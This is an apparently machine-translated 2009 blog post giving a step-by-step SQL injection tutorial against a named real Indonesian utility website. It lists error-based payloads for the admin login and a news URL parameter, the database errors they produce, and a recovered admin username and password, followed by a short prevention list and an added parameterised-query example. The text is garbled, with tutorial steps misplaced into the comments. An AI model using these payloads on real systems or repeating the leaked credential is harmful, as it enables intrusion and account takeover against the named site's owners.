Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index

  • 8/14/2019 Quick Step Broken AMN Hack Wlan Hack Website Hack Admin Index


    Breaking the Web with Step-by-Step SQL Injection

    Submitted by ArBoy on Sun, 18/10/2009 - 15:54

    Until March 2006, there is still a web site in the Republic of Indonesia that can be broken into with SQL Injection techniques. Do you know how dangerous this one bug is? Here we present SQL Injection step by step, taken directly from the writings of iko ([email protected]).

    Note: we limit the discussion to SQL Injection on MS-SQL Server.
    We'll take the site www.pln-wilkaltim.co.id as the example.

    There are two weaknesses in this site, namely:
    1. Table News
    2. Table Admin

    The first step is to determine which holes can be injected by walking through (enumerating) the inputs used on the site.
    We will find two kinds of input parameter: input entered through an input box and input passed through the URL address.

    We take the easiest first, the input box.
    We look for the admin login box, found at www.pln-wilkaltim.co.id/sipm/admin/admin.asp
    The first step is to determine the table name and its fields. We inject the NIP box with this command (the password can be anything, and just leave the branch alone):
    'having 1 = 1 --
    Do not forget to write the single quote and the double hyphen (important).
    The meaning of these two marks can be found in the SQL Injection tutorial at www.neoteker.or.id (see archives above).


    The following error message then comes out:
    -------
    Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
    [Microsoft][ODBC SQL Server Driver][SQL Server] Column 'T_ADMIN.NOMOR' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
    /sipm/admin/dologin.asp, line 7
    -------
    Out comes our first field name!
    Write down the name of the table: T_ADMIN
    Note the name of the field: NOMOR

    Then we find the names of the next fields, along with the table name, which may differ.
    We inject the NIP box (the password can be anything):
    'Group by T_ADMIN.NOMOR having 1 = 1 --
    The error message that comes out:
    -------
    Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
    [Microsoft][ODBC SQL Server Driver][SQL Server] Column 'T_ADMIN.NIP' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
    /sipm/admin/dologin.asp, line 7
    -------
    This gives us the table name and our second field.
    Note: T_ADMIN.NIP

    Then we find the third field:
    'Group by T_ADMIN.NOMOR, T_ADMIN.NIP having 1 = 1 --
    The error message that comes out:
    -------
    Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
    [Microsoft][ODBC SQL Server Driver][SQL Server] Column 'T_ADMIN.PASSWORD' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
    /sipm/admin/dologin.asp, line 7
    -------
    Write down the third field: T_ADMIN.PASSWORD

    Repeat the above steps until we find the last field.

    Here is the error message that occurs when we check the last field by injecting:
    'Group by T_ADMIN.NOMOR, T_ADMIN.NIP, T_ADMIN.PASSWORD, T_ADMIN.NAMA, T_ADMIN.KD_RANTING, T_ADMIN.ADDRESS, T_ADMIN.EMAIL having 1 = 1 --


    We must repeat the above command for the next column, by changing nama_kolom in:
    'Union select sum (nama_kolom) from T_ADMIN -
    to the next column.
    We get the types of the 7 columns:
    T_ADMIN.NOMOR => numeric
    T_ADMIN.NIP => char
    T_ADMIN.PASSWORD => nvarchar
    T_ADMIN.NAMA => char
    T_ADMIN.KD_RANTING => char
    T_ADMIN.ADDRESS => nvarchar
    T_ADMIN.EMAIL => char

    The next step is to find the contents of the password field for an admin user, by injecting:
    'Union select min (NAMA), 1,1,1,1,1,1 from T_ADMIN where NAME>' a'-
    This means we choose the minimum user name greater than 'a' and try to convert it to type integer.
    The number 1 written 6 times means that we select only the NAME column and ignore the other 6 columns.
    The error message that comes out:
    -------
    Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
    [Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the varchar value 'bill' to a column of data type int.
    /sipm/admin/dologin.asp, line 7
    -------
    You see: varchar value 'bill'
    'bill' was the name of the user in the last record entered, or the contents of the NAME column in the last record inserted.

    Next we inject:
    'Union select min (PASSWORD), 1,1,1,1,1,1 from T_ADMIN where NAME = 'bill' -
    Note: it must be on a single line (not cut).
    The error that comes out:
    -------
    Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
    [Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'm @ mpusk @ u' to a column of data type int.
    /sipm/admin/dologin.asp, line 7
    -------
    This means that we succeed!
    We get:
    [+] NAME = bill
    [+] PASSWORD = m @ mpusk @ u

    Please log in at:
    www.pln-wilkaltim.co.id/sipm/admin/admin.asp
    with the above account. As for the branch, please fill it in yourself by trial and error.

    Or we use the shortcut ....

    We inject:
    'Union select min (KD_RANTING), 1,1,1,1,1,1 from T_ADMIN where NAME = 'bill' -
    Note: it must be on a single line.
    Duarrrrrr ... ... ....
    Glhodhak ... ... ... ....
    Straight into the admin menu.
    Remember: do not do any damage! Tell the admin!

    The second hole is in the news.
    Basically the news content sits in another table. So we can still inject!
    The difference is that we must enter the parameters in the URL address.
    Example:
    www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
    There are the parameters id and idSM.
    When we try to inject, only the id parameter has an effect (CMIIW).

    We inject:
    www.pln-wilkaltim.co.id/dari_Media.asp?id=2119 'having 1 = 1 --
    The error message that comes out:
    ---------
    Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
    [Microsoft][ODBC SQL Server Driver][SQL Server] Column 'tb_news.NewsId' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
    /dari_Media.asp, line 58
    ---------
    This means 'tb_news.NewsId' is the name of our table and first column.

    Repeat the steps above until we get:
    tb_news.NewsId => numeric
    tb_news.NewsCatId => numeric
    tb_news.EntryDate => datetime
    tb_news.Title => nvarchar
    tb_news.Content =>
    tb_news.FotoLink =>
    tb_news.FotoType => bits of data
    tb_news.review =>
    tb_news.sumber => char
    tb_news.dateagenda => datetime

    Well, developing your knowledge from here is your own work.
    You would be able to insert a news item whose contents you set yourself.

    This is why holes like this in MS-SQL Server are so dangerous.

    In my estimation, the party names on the Commission website that was hacked by Shizoprenic were also held in database tables, so they could still be reached by SQL Injection like this.

    ******************************************************
    SPECIAL FOR ADMIN & WEB PROGRAMMER!
    ******************************************************
    How to prevent it, in general:
    1. Limit the length of the input box (if possible) by limiting it in the program code, so that beginner crackers will be confused for a moment when they see that the input box cannot be injected with a long command.
    2. Filter the input entered by the user, especially the use of single quotes (Input Validation).
    3. Turn off or hide the error messages that come out of the running SQL Server.
    4. Turn off standard facilities such as Stored Procedures and Extended Stored Procedures if possible.
    5. Change "Startup and run SQL Server" to use a low-privilege user in the SQL Server Security tab.
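A login handler written along the lines of items 1 to 3 above, next to the concatenated form that produces the error messages shown earlier. This is an added example, not code from the original article or from the site it describes: Python's sqlite3 stands in for MS-SQL Server, the table holds constructed sample data, the NIP format is an assumption, and the example goes beyond the list by binding the inputs as query parameters.

```python
import logging
import re
import sqlite3

log = logging.getLogger("login")
NIP_PATTERN = re.compile(r"[0-9]{1,18}")   # assumed NIP format: digits only
FAILED = (False, "login failed")           # the only failure text a client sees


def make_db():
    """Constructed sample table; column names follow the article."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE T_ADMIN (NIP TEXT, PASSWORD TEXT, NAMA TEXT)")
    db.execute("INSERT INTO T_ADMIN VALUES "
               "('10001', 'example-password', 'sample user')")
    return db


def login_vulnerable(db, nip, password):
    """Input is spliced into the SQL text and the raw driver error is
    echoed back, which is what exposes table and column names."""
    sql = ("SELECT NAMA FROM T_ADMIN WHERE NIP = '" + nip +
           "' AND PASSWORD = '" + password + "'")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return (False, str(exc))           # database detail reaches the client
    return (True, "welcome") if row else FAILED


def login_hardened(db, nip, password):
    # Items 1 and 2: bound the length and allow-list the characters.
    if not NIP_PATTERN.fullmatch(nip) or len(password) > 128:
        return FAILED
    try:
        # Values are bound as parameters, so a quote in the input is data
        # and can never change the structure of the statement.
        # PASSWORD is compared in plaintext only to mirror the article's
        # table; a real table should hold a salted password hash.
        row = db.execute(
            "SELECT NAMA FROM T_ADMIN WHERE NIP = ? AND PASSWORD = ?",
            (nip, password)).fetchone()
    except sqlite3.Error:
        # Item 3: full detail goes to the server log, not to the client.
        log.exception("login query failed")
        return FAILED
    return (True, "welcome") if row else FAILED
```

Validation alone is the weaker of the two controls; the bound parameters are what remove the injection, and the generic failure message removes the error channel.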

    Well, that's probably all I can tell you ...
    It is a picture of how unsafe the Internet world is ...
    If you want to be more secure, unplug your network cable, take out the disk drive, take out your hard drive, sell your computer!
    Just kidding :)

    Comments

    Submitted by ArBoy on Thu, 20/10/2009 - 16:42. #1

    certainly understand dong ga ...


    --------------------
    Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
    [Microsoft][ODBC SQL Server Driver][SQL Server] All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
    /sipm/admin/dologin.asp, line 7
    --------------------
    This means the NOMOR column is of numeric type.

    Next we inject:
    'Union select sum (NIP) from T_ADMIN --
    The error message that comes out:
    --------------------
    Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
    [Microsoft][ODBC SQL Server Driver][SQL Server] The sum or average aggregate operation cannot take a char data type as an argument.
    /sipm/admin/dologin.asp, line 7
    --------------------
    This means the NIP column is of type char.
